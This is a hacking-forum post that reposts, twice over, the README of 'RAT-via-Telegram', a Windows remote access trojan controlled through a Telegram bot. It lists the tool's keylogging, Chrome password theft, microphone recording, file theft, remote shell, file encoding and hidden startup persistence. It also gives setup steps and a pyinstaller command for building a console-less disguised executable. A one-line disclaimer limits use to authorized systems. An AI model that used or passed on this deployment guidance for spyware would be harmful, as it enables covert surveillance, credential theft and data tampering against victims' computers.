dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 32
- Reaction score
- 45,552
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
RAT-via-Telegram
Windows Remote Administration Tool via Telegram (Python 2.7) | Originally created by
Why another one?
[*]This RAT overcomes both these issues by using the Telegram bot API.
Features:
Thanks
:
& More coming soon!
Screenshots:
Installation & Usage:
[*]To run the script: python RATAttack.py.
[*]Find your bot on telegram and send some command to the bot to test it.
[*]To restrict the bot so that it responds only to you, note down your chat_id from the console and replace it in the script and comment out the line return True. Don't worry, you'll know when you read the comments in the script.
- A folder named `RATAttack` will be created in your working directory containing `keylogs.txt` and any files you upload to the bot.
Commands:
When using the below commands; use / as a prefix. For example: /pc_info.
arp - display arp table
capture_pc - screenshot PC
cmd_exec - execute shell command
cp - copy files
cd - change current directory
delete - delete a file/folder
download - download file from target
decode_all - decode ALL encoded local files
dns - display DNS Cache
encode_all - encode ALL local files
freeze_keyboard - enable keyboard freeze
unfreeze_keyboard - disable keyboard freeze
get_chrome - Get Google Chrome's login/passwords
hear - record microphone
ip_info - via ipinfo.io
keylogs - get keylogs
ls - list contents of current or specified directory
msg_box - display message box with text
mv - move files
pc_info - PC information
ping - makes sure target is up
play - plays a youtube video
proxy - opens a proxy server
pwd - show current directory
python_exec - interpret python
reboot - reboot computer
run - run a file
schedule - schedule a command to run at specific time
self_destruct - destroy all traces
shutdown - shutdown computer
tasklist - display services and processes running
to - select targets by it's name
update - update executable
wallpaper - change wallpaper
You can copy the above to update your command list via BotFather so you don't have to type them manually.
Compiling:
How To Compile:
Either:
Replace your path in compileAndRun.bat (running this will actually run the executable)
Or:
Modifying Settings:
Notes:
Contributing:
Disclaimer:
This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal.
License:
The MIT License
Download:
Windows Remote Administration Tool via Telegram (Python 2.7) | Originally created by
This link is hidden for visitors. Please Log in or register now.
Why another one?
- The current Remote Administration Tools in the market face 2 major problems:
Lack of encryption.
- Require port forwarding in order to control from hundreds of miles.
[*]This RAT overcomes both these issues by using the Telegram bot API.
Fully encrypted. The data being exchanged cannot be spied upon using MITM tools.
- Telegram messenger app provides a simple way to communicate to the target without configuring port forward before hand on the target.
Features:
- Keylogger with window title log included
- Get target PC's Windows version, processor and more
- Get target PC's IP address information and approximate location on map
- Delete, Move files
- Show current directory
- Change current directory
- List current or specified directory
- Download any file from the target
- Upload local files to the target. Send your image, pdf, exe or anything as file to the Telegram bot
- Autostart playing a video in fullscreen and no controls for a youtube video on target
- Take Screenshots
- Execute any file
- Access to microphone
- Start HTTP Proxy Server
- Freeze target's keyboard
- Schedule tasks to run at specified datetime
- Encode/Decode all local files
- Ping targets
- Update .exe -- thanks
This link is hidden for visitors. Please Log in or register now.
- Self-Destruct RAT
- Change wallpaper from file or url
- Execute arbitrary python 2.7 on the go
- Execute cmd shell
- [TODO] Browser (IE, Firefox, Chrome) cookies retrieval
- [TODO] Password retrieval
- [TODO] Monitor web traffic (graphically?)
- [TODO] Fine-tuning scripting (i.e.: if app x is opened y is executed)
- [TODO] Freeze target's mouse
- [TODO] Capture clipboard (Text, Image)
- [TODO] Hide desktop icons
- [TODO] Take snapshots from the webcam (if attached)
- [TODO] Audio compression
Thanks
This link is hidden for visitors. Please Log in or register now.
- Chrome login/password retrieval
- Display ARP table
- Get active processes and services
- Shutdown/Reboot computer
- Display DNS Cache
& More coming soon!
Screenshots:
This link is hidden for visitors. Please Log in or register now.
Installation & Usage:
- Clone this repository.
- Set up a new Telegram bot talking to the BotFather.
- Copy this token and replace it in the beginning of the script.
- Install the dependencies: pip install -r requirements.txt.
- Install pyHook 64-bit or 32-bit depending on your system.
For 64-bit- pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.
- For 32-bit- pip install pyHook-1.5.1-cp27-cp27m-win32.whl.
[*]To run the script: python RATAttack.py.
[*]Find your bot on telegram and send some command to the bot to test it.
[*]To restrict the bot so that it responds only to you, note down your chat_id from the console and replace it in the script and comment out the line return True. Don't worry, you'll know when you read the comments in the script.
This link is hidden for visitors. Please Log in or register now.
- A folder named `RATAttack` will be created in your working directory containing `keylogs.txt` and any files you upload to the bot.
Commands:
When using the below commands; use / as a prefix. For example: /pc_info.
arp - display arp table
capture_pc - screenshot PC
cmd_exec - execute shell command
cp - copy files
cd - change current directory
delete - delete a file/folder
download - download file from target
decode_all - decode ALL encoded local files
dns - display DNS Cache
encode_all - encode ALL local files
freeze_keyboard - enable keyboard freeze
unfreeze_keyboard - disable keyboard freeze
get_chrome - Get Google Chrome's login/passwords
hear - record microphone
ip_info - via ipinfo.io
keylogs - get keylogs
ls - list contents of current or specified directory
msg_box - display message box with text
mv - move files
pc_info - PC information
ping - makes sure target is up
play - plays a youtube video
proxy - opens a proxy server
pwd - show current directory
python_exec - interpret python
reboot - reboot computer
run - run a file
schedule - schedule a command to run at specific time
self_destruct - destroy all traces
shutdown - shutdown computer
tasklist - display services and processes running
to - select targets by it's name
update - update executable
wallpaper - change wallpaper
You can copy the above to update your command list via BotFather so you don't have to type them manually.
Compiling:
How To Compile:
Either:
Replace your path in compileAndRun.bat (running this will actually run the executable)
Or:
Code:
Run `pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`. You can also pass `--icon=<path\to\icon.ico>` to use any custom icon.- Once it is compiled successfully, find the .exe file in C:\Python27\Scripts\dist\. You can change the name of the .exeto anything you wish.
- BEWARE! If you run the compiled .exe, the script will hide itself and infect your PC to run at startup. You can return to normal by using the /self_destruct option or manually removing C:\Users\Username\AppData\Roaming\Portal directory and C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk (although I recommend removing them manually for the time being).
Modifying Settings:
- You can also modify the name of hidden .exe file and location & name of the folder where the hidden .exe will hide itself. To do this; modify compiled_name and hide_folder respectively.
- Assign your known chat ids to beginning of RATAttack.py
Notes:
- Currently only Python2 is supported. Python3 support will be added soon!
Contributing:
- This project is still in very early stages, so you can expect some bugs. Please feel free to report them! Even better, send a pull request
- Any new features and ideas are most welcome! Please do submit feature requests by creating Issues
Disclaimer:
This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal.
License:
The MIT License
Download:
Last edited by a moderator: